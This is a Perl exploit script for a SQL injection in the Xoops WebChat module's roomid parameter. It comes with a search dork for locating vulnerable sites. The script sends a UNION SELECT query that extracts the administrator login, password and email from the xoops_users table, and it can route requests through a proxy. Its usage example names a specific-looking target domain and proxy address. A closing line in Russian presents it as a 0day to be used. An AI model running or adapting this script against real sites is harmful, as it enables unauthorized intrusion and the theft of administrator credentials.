Xoops WebChat Version: latest -- 1.60 Dork: inurl:/modules/WebChat/ roomid Code: #!/usr/bin/perl use LWP::UserAgent; use strict; my ($path,$proxy,$ua,$answ,$upe,$u,$p,$e); my $path = shift; my $proxy = shift; &usage; if(!$ARGV[1]) {print "\n\nProxy not found :d";} else {print "\n\nProxy found, $ARGV[1]";} print "\n\n[~]Waiting...\n[~]Getting administrators data -- [uname, pass, email]"; $ua=LWP::UserAgent->new; $ua->agent("Mozilla/4.0"); if($proxy){ $ua->proxy('http',"http://".$proxy."/"); } $answ = $ua->get("http://$path/index.php?roomid=-2222+union+select+1,unhex(hex(concat(0x3A3A3A,uname,0x3a,pass,0x3a,email,0x3A3A3A))),3,4,5+from+xoops_users+limit+0,1")->content; $answ =~m#:::(.+):::#; $upe = $1; if(!$1) {print "\nExploit failed!";} else { ($u,$p,$e) = split(':',$upe); print "\n\nlogin: $u\npassword: $p\nemail: $e\n"; } sub usage { print q { :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: Xoops WebChat SQL Injection Exploit (roomid) Author: ZAMUT Vuln: roomid= Homepage: http://antichat.ru Usage: exploit.pl [path] [proxy] Example: perl exploit.pl trick-click.com/exoops/modules/WebChat 62.123.110.134:8080 :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: }; } 0day, пользуемся
